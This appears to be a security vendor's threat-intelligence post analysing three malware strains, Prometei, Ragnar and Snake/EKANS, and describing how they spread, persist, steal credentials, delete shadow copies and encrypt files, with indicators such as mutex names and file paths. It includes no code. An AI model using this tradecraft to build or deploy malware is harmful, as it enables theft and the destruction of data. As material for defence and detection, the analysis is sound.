Coinminer botnet exploits SMB: Coiminer/Prometei

A new variant of coinminer dubbed as Prometei is found to be in the wild since march this year providing financial benefits to the attacker by mining the Monero online currency on infected Windows machines.

It spreads with botnet binaries being copied from other infected systems via Windows SMB (Server Message Block), using passwords retrieved with Mimikatz (an open-source application that allows users to view authentication credentials) and EternalBlue (an exploit that allows cyber threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets). The malware steals administrator credentials and sends them to the attackers, which could be used on future attacks.

The malware executes the powershell script after exploiting SMB via brute forcing. Powershell script downloads and saves binary files in C:\windows\dell\ directory.

The malware binary on execution checks for existence of directory C:\windows\dell\ to create it. It also checks for the existence of service UPlugPlay, before copying itself as “c:\windows\svchost.exe” and adds a service (command line) under the name UPlugPlay with the copied binary. Then it tries to connect to the attackers CnC server via RC4 encrypted HTTP. The RC4 key used for encryption is generated uniquely for every machine and it is shared with the attacker’s CnC server.

The malware collects the following information from the infected systems and sends them to the attacker,

  • Machine name
  • Processor name
  • Memory size
  • System model
  • Domain name
  • OS Installation date
  • OS Serial number

Then it waits for commands from the CnC server, allowing the attacker to remotely control the infected machines. The commands and the actions done by the malware are,

It executes Mimikatz tool to steal the credentials.The stolen credentials are used to spread the malware to other machines via SMB protocol. It uses psexec tool to remotely execute the malware copied via SMB on other machines. if the attempt to copy files using SMB fails it uses EternalBlue to exploit and spread.

It downloads and executes XMRig, an open sourced Monero CPU Miner. The miner could be controlled by the attacker via commands issued to backdoor module.

Arctos Networks detects the malware as Coinminer/Prometei.

If you find traces of this malware in your IT infrastructure you can contact our technical response team to remove the threats for your network.

Ragnor locks your files

Ragnar ransomware affects devices running Microsoft Windows operating systems. It was initially observed in November of 2019 as part of a series of attacks against compromised networks.The cyber criminals behind Ragnar claimed to have stolen 10 TB of data from Energias de Portugal (EDP), demanding a payment of $11 million.

Technical details

The ransomware doesn’t execute its payload on windows machines with the following languages: Azerbaijani, Belorussian, Georgian, Kyrgyz, Kazakh, Russian, Ukrainian, Moldavian, Turkmen, Uzbek and Tajik.

It collects GUID, OS (product) name, Logged in user name and machine name information from infected systems.

It is used to create event to avoid duplicate process of itself running in the same machine. It stops the following services in the machine,

  • Sophos (Sophos Antivirus)
  • Veeam (Veeam Backup)
  • Backup (Asus WebStorage)
  • Pulseway (Pulseway remote control)
  • Logme (Logme remote control software)
  • Logmein (Logmein remote control software)
  • ConnectWise (ConnectWise remote control software
  • Splashtop (Splashtop remote control software)

It also stops the services on which the above listed services are dependent on. After stopping the services the malware terminates the following processes,

The malware deletes the shadow copy using wmic (Windows Management Instrumentation Command) tool. Shadow Copy is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use.

It enumerates the files and directories in the logical drives of the machine.

It skips enumerating files in the directories with following names,

It also skips encrypting the files with following filenames and extensions,

It also skips the files with the string _RAGNAR_ at the end of it.

Ransomware decodes the base64 encoded PEM key, utilized to protect the crypto keys used in the encryption(locking) of files. With this key it encrypts 2 keys generated with system specific information.

It uses Salsa20 algorithm to encrypt(lock) the contents of the files.

The encrypted file contents are saved in files with extension .ragnar_<8 digit custom hash of system name>

It decrypts the ransom notes and show them by executing notepad.

Arctos Networks detects the malware as Ransomware/Ragnar.

If you find traces of this malware in your IT infrastructure, you can contact our technical response team to remove the threats for your network.

Snake bites Honda motors: Ransomware/Snake

Snake ransomware is found to be in the wild targeting Industrial control systems (ICS) since December 2019. Interestingly this malware is written in Go programming language, implementing obfuscation techniques up to certain extend. It has hit the Hondo motors network disrupting manufacturing in 9 factories in United States. The malware has encrypted critical files in essential systems rendering them unusable. Snake malware terminates several processes related to Endpoint Security, ICS, Visualization, Remote administration, network management, etc.

Technical details

Ransomware creates a mutex “EKANS” (snake in reverse) to avoid duplicate process execution on the victim’s computer. The ransomware doesn’t lock the files in the machine if the mutex creation fails (exists already).

It terminates the following processes in the infected systems:

One third of the processes it terminates are related to Industrial control systems (ICS).

The malware avoids encrypting files inside the following directories:

  • %SystemDrive%\AppData
  • %SystemDrive%\Boot
  • %SystemDrive%\Windows
  • %SystemDrive%\$Recycle.Bin
  • %SystemDrive%\ProgramData
  • %SystemDrive%\Program Files
  • %SystemDrive%\System Volume Information

The malware tries to resolve the domain, which is hard coded  in the binary.

The DNS details of the domain,

In every locked (encrypted) file, the malware adds the string EKANS at the end of the file. It creates a file Fix-Your-Files.txt in the desktop with ransom note.